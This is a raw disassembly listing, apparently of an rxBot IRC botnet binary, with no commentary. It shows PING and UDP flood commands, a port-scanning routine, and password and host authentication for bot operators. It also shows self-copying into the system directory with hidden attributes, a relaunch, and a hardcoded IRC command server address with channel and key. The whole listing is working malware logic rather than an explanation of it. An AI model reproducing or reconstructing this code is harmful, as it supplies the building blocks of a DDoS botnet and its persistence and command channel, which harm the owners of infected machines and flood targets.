push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
loc_40F1D6: ; CODE XREF: sub_409806+588A�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
pop ecx
pop ecx
loc_40F1E4: ; CODE XREF: sub_409806+5B24�j
xor esi, esi
loc_40F1E6: ; CODE XREF: sub_409806+46D3�j
; sub_409806+59C9�j ...
cmp [ebp+var_C], esi
jnz loc_40EE11
push esi
jmp loc_40EDF6
; ---------------------------------------------------------------------------
loc_40F1F5: ; CODE XREF: sub_409806+14D7�j
; sub_409806+14EB�j ...
cmp dword_43A528, 0
jnz loc_40F311
mov eax, [ebp+var_C]
mov [ebp+var_610], eax
mov eax, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_614], eax
lea eax, [ebp+var_6A8]
push eax
call sub_4169C0
push [ebp+ebx+var_9C]
call sub_416C92
push [ebp+ebx+var_98]
mov [ebp+var_628], eax
call sub_416C92
push [ebp+arg_0]
mov [ebp+var_624], eax
call sub_416C92
push 7Fh
push [ebp+var_9C]
mov [ebp+var_620], eax
lea eax, [ebp+var_728]
push eax
call sub_4169C0
push [ebp+var_620]
mov eax, [ebp+arg_4]
push [ebp+var_624]
mov [ebp+var_72C], eax
lea eax, [ebp+var_6A8]
push eax
push [ebp+var_628]
lea eax, [ebp+var_2F0]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax
call sub_416905
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Fh
push eax
call sub_4136B6
add esp, 48h
mov [ebp+var_618], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_72C]
push eax
push offset sub_4088F8
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_618]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40F304
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40F84D
; ---------------------------------------------------------------------------
loc_40F2FC: ; CODE XREF: sub_409806+5B04�j
push 32h
call dword_422000 ; Sleep
loc_40F304: ; CODE XREF: sub_409806+5AE3�j
cmp [ebp+var_60C], esi
jz short loc_40F2FC
jmp loc_40F1E6
; ---------------------------------------------------------------------------
loc_40F311: ; CODE XREF: sub_409806+59F6�j
push 1FFh
lea eax, [ebp+var_2F0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_4169C0
add esp, 0Ch
jmp loc_40F1E4
; ---------------------------------------------------------------------------
loc_40F32F: ; CODE XREF: sub_409806+149B�j
; sub_409806+14AF�j ...
mov eax, [ebp+var_C]
mov edi, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_610], eax
lea eax, [ebp+var_6A8]
push eax
mov [ebp+var_614], edi
call sub_4169C0
push [ebp+ebx+var_9C]
call sub_416C92
push [ebp+ebx+var_98]
mov [ebp+var_628], eax
call sub_416C92
push [ebp+arg_0]
mov [ebp+var_624], eax
call sub_416C92
mov ebx, [ebp+ebx+var_90]
xor esi, esi
add esp, 18h
cmp ebx, esi
mov [ebp+var_620], eax
jz short loc_40F3A7
push ebx
call sub_416C92
pop ecx
mov [ebp+var_61C], eax
jmp short loc_40F3AD
; ---------------------------------------------------------------------------
loc_40F3A7: ; CODE XREF: sub_409806+5B90�j
mov [ebp+var_61C], esi
loc_40F3AD: ; CODE XREF: sub_409806+5B9F�j
push 7Fh
push [ebp+var_9C]
lea eax, [ebp+var_728]
push eax
call sub_4169C0
push [ebp+var_620]
mov ebx, [ebp+arg_4]
push [ebp+var_624]
lea eax, [ebp+var_6A8]
push eax
push [ebp+var_628]
lea eax, [ebp+var_2F0]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax
mov [ebp+var_72C], ebx
call sub_416905
push esi
lea eax, [ebp+var_2F0]
push 10h
push eax
call sub_4136B6
add esp, 30h
mov [ebp+var_618], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_72C]
push eax
push offset sub_408A81
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_618]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40F46E
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
push eax
call sub_416905
add esp, 0Ch
loc_40F456: ; CODE XREF: sub_409806+5C70�j
cmp [ebp+var_C], esi
jnz loc_40EE11
push esi
push edi
jmp loc_40C886
; ---------------------------------------------------------------------------
loc_40F466: ; CODE XREF: sub_409806+5C6E�j
push 32h
call dword_422000 ; Sleep
loc_40F46E: ; CODE XREF: sub_409806+5C33�j
cmp [ebp+var_60C], esi
jz short loc_40F466
jmp short loc_40F456
; ---------------------------------------------------------------------------
loc_40F478: ; CODE XREF: sub_409806+1473�j
; sub_409806+1487�j
push 9
call sub_4138A6
mov esi, [ebp+ebx+var_9C]
push esi
mov edi, eax
call sub_416C92
add eax, edi
cmp eax, 258h
pop ecx
pop ecx
jle short loc_40F4CA
push edi
lea eax, [ebp+var_2F0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_416905
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
jmp loc_40D143
; ---------------------------------------------------------------------------
loc_40F4CA: ; CODE XREF: sub_409806+5C91�j
push [ebp+ebx+var_A0]
call sub_416C92
push esi
mov [ebp+var_4F4], eax
call sub_416C92
push [ebp+ebx+var_98]
mov [ebp+var_4DC], eax
call sub_416C92
add esp, 0Ch
cmp eax, 5
mov [ebp+var_4F0], eax
jnb short loc_40F50B
push 5
pop eax
mov [ebp+var_4F0], eax
loc_40F50B: ; CODE XREF: sub_409806+5CFA�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40F518
mov [ebp+var_4F0], ecx
loc_40F518: ; CODE XREF: sub_409806+5D0A�j
push [ebp+arg_0]
call sub_416C92
mov [ebp+var_4EC], eax
mov eax, 320h
cmp [ebp+var_4EC], eax
pop ecx
jbe short loc_40F53A
mov [ebp+var_4EC], eax
loc_40F53A: ; CODE XREF: sub_409806+5D2C�j
or [ebp+var_4D8], 0FFFFFFFFh
xor edi, edi
cmp dword_42E068, edi
mov [ebp+var_10], edi
jz short loc_40F5B1
mov ecx, offset dword_42E068
loc_40F553: ; CODE XREF: sub_409806+5D8B�j
mov edi, [ebp+ebx+var_A0]
lea esi, [ecx-28h]
loc_40F55D: ; CODE XREF: sub_409806+5D73�j
mov dl, [esi]
mov al, dl
cmp dl, [edi]
jnz short loc_40F57F
test al, al
jz short loc_40F57B
mov dl, [esi+1]
mov al, dl
cmp dl, [edi+1]
jnz short loc_40F57F
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40F55D
loc_40F57B: ; CODE XREF: sub_409806+5D61�j
xor eax, eax
jmp short loc_40F584
; ---------------------------------------------------------------------------
loc_40F57F: ; CODE XREF: sub_409806+5D5D�j
; sub_409806+5D6B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40F584: ; CODE XREF: sub_409806+5D77�j
test eax, eax
jz short loc_40F595
inc [ebp+var_10]
add ecx, 3Ch
cmp dword ptr [ecx], 0
jnz short loc_40F553
jmp short loc_40F5AF
; ---------------------------------------------------------------------------
loc_40F595: ; CODE XREF: sub_409806+5D80�j
mov eax, [ebp+var_10]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42E068[ecx]
mov [ebp+var_4F4], ecx
mov [ebp+var_4D8], eax
loc_40F5AF: ; CODE XREF: sub_409806+5D8D�j
xor edi, edi
loc_40F5B1: ; CODE XREF: sub_409806+5D46�j
cmp [ebp+var_4F4], edi
jnz short loc_40F5DB
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
loc_40F5BE: ; CODE XREF: sub_409806+5E3C�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
loc_40F5CA: ; CODE XREF: sub_409806+479F�j
pop ecx
pop ecx
loc_40F5CC: ; CODE XREF: sub_409806+48BD�j
; sub_409806+48D2�j
cmp [ebp+var_C], edi
jnz loc_40EE11
push edi
jmp loc_40EDF6
; ---------------------------------------------------------------------------
loc_40F5DB: ; CODE XREF: sub_409806+5DB1�j
mov esi, [ebp+ebx+var_90]
cmp esi, edi
mov [ebp+var_1C], esi
jz short loc_40F619
cmp byte ptr [esi], 23h
jz short loc_40F619
push esi
lea eax, [ebp+var_608]
push 10h
push eax
call sub_416B5D
push 78h
push esi
call sub_417E10
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4C8], eax
jmp loc_40F72E
; ---------------------------------------------------------------------------
loc_40F619: ; CODE XREF: sub_409806+5DE1�j
; sub_409806+5DE6�j
cmp [ebp+var_38F], 0
jnz short loc_40F647
cmp [ebp+var_38E], 0
jnz short loc_40F647
cmp byte ptr [ebp+var_380+2], 0
jnz short loc_40F647
cmp byte ptr [ebp+var_380+1], 0
jnz short loc_40F647
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_40F5BE
; ---------------------------------------------------------------------------
loc_40F647: ; CODE XREF: sub_409806+5E1A�j
; sub_409806+5E23�j ...
push 10h
pop esi
lea eax, [ebp+var_BC]
push eax
lea eax, [ebp+var_D8]
push eax
push [ebp+arg_4]
mov [ebp+var_BC], esi
call dword_43A308 ; getsockname
mov al, [ebp+var_38F]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_608]
push eax
call sub_4169C0
add esp, 0Ch
cmp byte ptr [ebp+var_380+2], 0
jz short loc_40F6FC
xor eax, eax
cmp [ebp+var_38F], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_608]
push eax
call sub_416960
and byte ptr [ebp+arg_0+3], 0
cmp esi, edi
pop ecx
pop ecx
jle short loc_40F6F0
loc_40F6CE: ; CODE XREF: sub_409806+5EE8�j
cmp eax, edi
jz short loc_40F6F0
mov byte ptr [eax], 78h
lea eax, [ebp+var_608]
push 30h
push eax
call sub_416960
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, esi
jl short loc_40F6CE
loc_40F6F0: ; CODE XREF: sub_409806+5EC6�j
; sub_409806+5ECA�j
mov [ebp+var_4C8], 1
jmp short loc_40F702
; ---------------------------------------------------------------------------
loc_40F6FC: ; CODE XREF: sub_409806+5E9F�j
mov [ebp+var_4C8], edi
loc_40F702: ; CODE XREF: sub_409806+5EF4�j
cmp byte ptr [ebp+var_380+1], 0
jz short loc_40F72E
push edi
push 9
push offset aStoppingPrevio ; "Stopping previous scans"
push offset aScan_0 ; "[SCAN]"
push 1
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4138EC
add esp, 20h
loc_40F72E: ; CODE XREF: sub_409806+5E0E�j
; sub_409806+5F03�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4D0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4CC], eax
mov esi, 80h
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_416B5D
mov ebx, [ebp+ebx+var_8C]
add esp, 0Ch
cmp ebx, edi
jz short loc_40F782
push ebx
loc_40F770: ; CODE XREF: sub_409806+5F89�j
push esi
loc_40F771: ; CODE XREF: sub_409806+5FA6�j
lea eax, [ebp+var_578]
push eax
call sub_416B5D
add esp, 0Ch
jmp short loc_40F7B5
; ---------------------------------------------------------------------------
loc_40F782: ; CODE XREF: sub_409806+5F67�j
mov eax, [ebp+var_1C]
cmp eax, edi
jz short loc_40F791
cmp byte ptr [eax], 23h
jnz short loc_40F791
push eax
jmp short loc_40F770
; ---------------------------------------------------------------------------
loc_40F791: ; CODE XREF: sub_409806+5F81�j
; sub_409806+5F86�j
xor ecx, ecx
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 422B0Ah
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40F7AE
push eax
push 80h
jmp short loc_40F771
; ---------------------------------------------------------------------------
loc_40F7AE: ; CODE XREF: sub_409806+5F9E�j
and [ebp+var_578], 0
loc_40F7B5: ; CODE XREF: sub_409806+5F7A�j
xor esi, esi
cmp [ebp+var_4C8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40F7C9
mov eax, offset aSequential ; "Sequential"
loc_40F7C9: ; CODE XREF: sub_409806+5FBC�j
push [ebp+var_4DC]
lea ecx, [ebp+var_608]
push [ebp+var_4EC]
push [ebp+var_4F0]
push [ebp+var_4F4]
push ecx
push eax
lea eax, [ebp+var_2F0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_416905
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_4136B6
add esp, 2Ch
mov [ebp+var_4E8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_608]
push eax
push offset sub_401B65
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_4E8]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40F869
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
loc_40F84D: ; CODE XREF: sub_409806+59B4�j
; sub_409806+5AF1�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
add esp, 0Ch
jmp loc_40F1E6
; ---------------------------------------------------------------------------
loc_40F861: ; CODE XREF: sub_409806+6069�j
push 32h
call dword_422000 ; Sleep
loc_40F869: ; CODE XREF: sub_409806+6039�j
cmp [ebp+var_4C4], esi
jz short loc_40F861
jmp loc_40F1E6
; ---------------------------------------------------------------------------
loc_40F876: ; CODE XREF: sub_409806+D18�j
; sub_409806+D2C�j
push [ebp+ebx+var_A0]
xor eax, eax
cmp byte ptr [ebp+var_380], al
setnz al
push eax
push dword_42FCDC
lea eax, [ebp+var_4BC]
push eax
call sub_411098
lea eax, [ebp+var_4BC]
push eax
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405CD5
lea eax, [ebp+var_4BC]
push eax
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
call sub_401F41
loc_40F8C0: ; CODE XREF: sub_409806+5829�j
add esp, 24h
loc_40F8C3: ; CODE XREF: sub_409806+738�j
; sub_409806+744�j ...
mov eax, [ebp+arg_24]
jmp loc_409A87
; ---------------------------------------------------------------------------
loc_40F8CB: ; CODE XREF: sub_409806+7C5�j
; sub_409806+7D9�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov [ebp+var_8], ebx
jz loc_409A84
cmp [ebp+var_1C], 0
jnz loc_409A84
push offset asc_42A9BC ; "!"
push [ebp+var_A4]
call sub_417779
mov esi, eax
push offset dword_428738
push 0
inc esi
call sub_417779
push offset asc_428734 ; "~"
push eax
call sub_417779
mov edi, [ebp+var_8]
mov ebx, eax
add esp, 18h
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40F91E: ; CODE XREF: sub_409806+6134�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_40F940
test cl, cl
jz short loc_40F93C
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_40F940
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_40F91E
loc_40F93C: ; CODE XREF: sub_409806+6122�j
xor eax, eax
jmp short loc_40F945
; ---------------------------------------------------------------------------
loc_40F940: ; CODE XREF: sub_409806+611E�j
; sub_409806+612C�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40F945: ; CODE XREF: sub_409806+6138�j
test eax, eax
jz short loc_40F994
push ebx
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_405CD5
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_405CD5
push ebx
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
loc_40F980: ; CODE XREF: sub_409806+61E1�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
add esp, 30h
jmp loc_40EE11
; ---------------------------------------------------------------------------
loc_40F994: ; CODE XREF: sub_409806+6141�j
xor edi, edi
loc_40F996: ; CODE XREF: sub_409806+61A8�j
push ebx
push off_42FDB4[edi]
call sub_413FBC
test eax, eax
pop ecx
pop ecx
jnz short loc_40F9E9
add edi, 4
cmp edi, 4
jb short loc_40F996
push ebx
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_405CD5
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_405CD5
push ebx
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
jmp short loc_40F980
; ---------------------------------------------------------------------------
loc_40F9E9: ; CODE XREF: sub_409806+61A0�j
mov edx, [ebp+arg_18]
xor eax, eax
loc_40F9EE: ; CODE XREF: sub_409806+622A�j
cmp byte ptr [edx], 0
jnz short loc_40FA26
mov edi, [ebp+var_8]
mov esi, offset aN3m3s1s ; "n3m3s1s"
loc_40F9FB: ; CODE XREF: sub_409806+6211�j
mov bl, [esi]
mov cl, bl
cmp bl, [edi]
jnz short loc_40FA1D
test cl, cl
jz short loc_40FA19
mov bl, [esi+1]
mov cl, bl
cmp bl, [edi+1]
jnz short loc_40FA1D
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_40F9FB
loc_40FA19: ; CODE XREF: sub_409806+61FF�j
xor ecx, ecx
jmp short loc_40FA22
; ---------------------------------------------------------------------------
loc_40FA1D: ; CODE XREF: sub_409806+61FB�j
; sub_409806+6209�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_40FA22: ; CODE XREF: sub_409806+6215�j
test ecx, ecx
jz short loc_40FA37
loc_40FA26: ; CODE XREF: sub_409806+61EB�j
inc eax
add edx, 80h
cmp eax, 2
jl short loc_40F9EE
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40FA37: ; CODE XREF: sub_409806+621E�j
shl eax, 7
add eax, [ebp+arg_18]
push 7Fh
lea ecx, [ebp+var_8DC]
push ecx
push eax
call sub_4169C0
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40FA70
push 0
push [ebp+var_4]
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40FA70: ; CODE XREF: sub_409806+624D�j
lea eax, [ebp+var_F0]
push eax
push offset aMainUserSLog_1 ; "[MAIN]: User: %s logged in."
loc_40FA7C: ; CODE XREF: sub_409806+6F5�j
; sub_409806+5065�j ...
call sub_401F41
pop ecx
loc_40FA82: ; CODE XREF: sub_409806+39B3�j
pop ecx
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40FA88: ; CODE XREF: sub_409806+1FA�j
; sub_409806+20D�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_405CD5
push offset aIx ; "+ix"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_405CD5
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405CD5
xor eax, eax
add esp, 2Ch
inc eax
mov dword_480AC0, eax
jmp loc_409A87
sub_409806 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FAD0 proc near ; CODE XREF: .text:004187AF�p
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = byte ptr -0E8h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_4034BE
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, dword_42201C
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_480AB8, eax
call esi ; GetTickCount
push eax
call sub_41698D
pop ecx
call sub_4061D5
push 2
call dword_43A374 ; SetErrorMode
push 7530h
push offset aRxbot012 ; "Rxbot012"
push ebx
push ebx
call dword_422104 ; CreateMutexA
push eax
call dword_422100 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40FB4F
push 1
jmp loc_40FDAF
; ---------------------------------------------------------------------------
loc_40FB4F: ; CODE XREF: sub_40FAD0+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_43A3AC ; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_410022
cmp [ebp+var_888], 2
jnz loc_41001C
cmp [ebp+var_887], 2
jnz loc_41001C
mov esi, 104h
push esi
lea eax, [ebp+var_3F4]
push eax
call dword_422048 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_2F0]
push eax
push ebx
call dword_4220A4 ; GetModuleHandleA
push eax
call dword_42200C ; GetModuleFileNameA
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_41802F
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_416B5D
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_4173D0
add esp, 30h
test eax, eax
jnz loc_40FDB5
cmp dword_42FCCC, ebx
mov esi, offset byte_42FD48
jz short loc_40FC57
mov eax, esi
xor edi, edi
lea ecx, [eax+1]
loc_40FC1D: ; CODE XREF: sub_40FAD0+152�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FC1D
sub eax, ecx
add eax, 0FFFFFFFAh
test eax, eax
jbe short loc_40FC57
loc_40FC2D: ; CODE XREF: sub_40FAD0+185�j
call sub_41699A
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, esi
lea ecx, [eax+1]
add dl, 61h
mov byte_42FD48[edi], dl
inc edi
loc_40FC47: ; CODE XREF: sub_40FAD0+17C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FC47
sub eax, ecx
add eax, 0FFFFFFFAh
cmp edi, eax
jb short loc_40FC2D
loc_40FC57: ; CODE XREF: sub_40FAD0+144�j
; sub_40FAD0+15B�j
push esi
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_1EC]
push offset aSS_0 ; "%s\\%s"
push eax
call sub_416905
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call dword_4220A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40FC97
push 80h
lea eax, [ebp+var_1EC]
push eax
call dword_4220CC ; SetFileAttributesA
loc_40FC97: ; CODE XREF: sub_40FAD0+1B3�j
mov esi, dword_422000
push 7D0h
call esi ; Sleep
mov edi, dword_4220FC
mov [ebp+var_4], ebx
jmp short loc_40FCD2
; ---------------------------------------------------------------------------
loc_40FCAF: ; CODE XREF: sub_40FAD0+215�j
call dword_422004 ; RtlGetLastWin32Error
cmp [ebp+var_4], ebx
jnz short loc_40FCE7
cmp eax, 20h
jz short loc_40FCC4
cmp eax, 5
jnz short loc_40FCE7
loc_40FCC4: ; CODE XREF: sub_40FAD0+1ED�j
push 3A98h
mov [ebp+var_4], 1
call esi ; Sleep
loc_40FCD2: ; CODE XREF: sub_40FAD0+1DD�j
push ebx
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_2F0]
push eax
call edi ; CopyFileA
test eax, eax
jz short loc_40FCAF
loc_40FCE7: ; CODE XREF: sub_40FAD0+1E8�j
; sub_40FAD0+1F2�j
lea eax, [ebp+var_1EC]
push eax
call sub_40746E
pop ecx
push 7
lea eax, [ebp+var_1EC]
push eax
call dword_4220CC ; SetFileAttributesA
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
xor edi, edi
inc edi
mov [ebp+var_5C], 422B0Ah
mov [ebp+var_68], 44h
mov [ebp+var_3C], edi
mov [ebp+var_38], bx
call dword_4220F8 ; GetCurrentProcessId
push eax
push edi
push 100000h
call dword_422078 ; OpenProcess
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_416905
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push edi
push ebx
push ebx
lea eax, [ebp+var_98C]
push eax
lea eax, [ebp+var_1EC]
push eax
call dword_422044 ; CreateProcessA
test eax, eax
jz short loc_40FDBB
push 0C8h
call esi ; Sleep
push [ebp+var_24]
mov esi, dword_42202C
call esi ; CloseHandle
push [ebp+var_20]
call esi ; CloseHandle
call dword_43A4BC ; WSACleanup
push ebx
loc_40FDAF: ; CODE XREF: sub_40FAD0+7A�j
call dword_422040 ; ExitProcess
loc_40FDB5: ; CODE XREF: sub_40FAD0+133�j
mov esi, dword_422000
loc_40FDBB: ; CODE XREF: sub_40FAD0+2BF�j
cmp dword_481178, 2
jle short loc_40FE03
mov eax, dword_48117C
push dword ptr [eax+4]
call sub_416C92
pop ecx
mov edi, eax
push 0FFFFFFFFh
push edi
call dword_422100 ; WaitForSingleObject
push edi
call dword_42202C ; CloseHandle
mov eax, dword_48117C
cmp [eax+8], ebx
jz short loc_40FE03
push 7D0h
call esi ; Sleep
mov eax, dword_48117C
push dword ptr [eax+8]
call dword_4220E4 ; DeleteFileA
loc_40FE03: ; CODE XREF: sub_40FAD0+2F2�j
; sub_40FAD0+31C�j
cmp dword_42FCD0, ebx
jz short loc_40FE20
cmp dword_43A508, ebx
jnz short loc_40FE20
lea eax, [ebp+var_4F8]
push eax
call sub_40210D
pop ecx
loc_40FE20: ; CODE XREF: sub_40FAD0+339�j
; sub_40FAD0+341�j
lea eax, [ebp+var_E8]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax
call sub_416905
push ebx
lea eax, [ebp+var_E8]
push ebx
push eax
call sub_4136B6
lea eax, [ebp+var_E8]
push eax
call sub_401ECD
xor eax, eax
mov ecx, 2E0h
mov edi, offset dword_47FF38
rep stosd
lea eax, [ebp+var_E8]
push offset aSecureSystemSe ; "[SECURE]: System secure monitor active."...
push eax
call sub_416905
push ebx
lea eax, [ebp+var_E8]
push 1Ah
push eax
call sub_4136B6
add esp, 2Ch
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push ebx
push offset sub_4118ED
push ebx
push ebx
call dword_422008 ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43B254[esi], eax
jnz short loc_40FEBC
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_E8]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_416905
add esp, 0Ch
loc_40FEBC: ; CODE XREF: sub_40FAD0+3CF�j
lea eax, [ebp+var_E8]
push eax
call sub_401ECD
call sub_41699A
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
mov ebx, offset dword_47FDD4
push ebx
mov dword_480AC4, eax
call sub_4169C0
mov eax, dword_42FCB0
push 3Fh
push offset aHell ; "#hell"
mov edi, offset dword_47FE54
push edi
mov dword_47FF24, eax
call sub_4169C0
push 3Fh
push offset aTroopers ; "troopers"
mov esi, offset dword_47FE94
push esi
call sub_4169C0
add esp, 28h
and dword_47FF28, 0
loc_40FF1C: ; CODE XREF: sub_40FAD0+4F5�j
; sub_40FAD0+501�j ...
and [ebp+var_4], 0
loc_40FF20: ; CODE XREF: sub_40FAD0+4AB�j
cmp dword_43A520, 0
jnz short loc_40FF40
push 0
lea eax, [ebp+var_14]
push eax
call dword_43A318 ; InternetGetConnectedState
test eax, eax
jnz short loc_40FF40
push 7530h
jmp short loc_40FF6E
; ---------------------------------------------------------------------------
loc_40FF40: ; CODE XREF: sub_40FAD0+457�j
; sub_40FAD0+467�j
and dword_480AC0, 0
push offset dword_47FDD0
call sub_4096A7
cmp eax, 2
mov [ebp+var_8], eax
jz loc_410017
cmp dword_480AC0, 0
jz short loc_40FF69
dec [ebp+var_4]
loc_40FF69: ; CODE XREF: sub_40FAD0+494�j
push 0BB8h
loc_40FF6E: ; CODE XREF: sub_40FAD0+46E�j
call dword_422000 ; Sleep
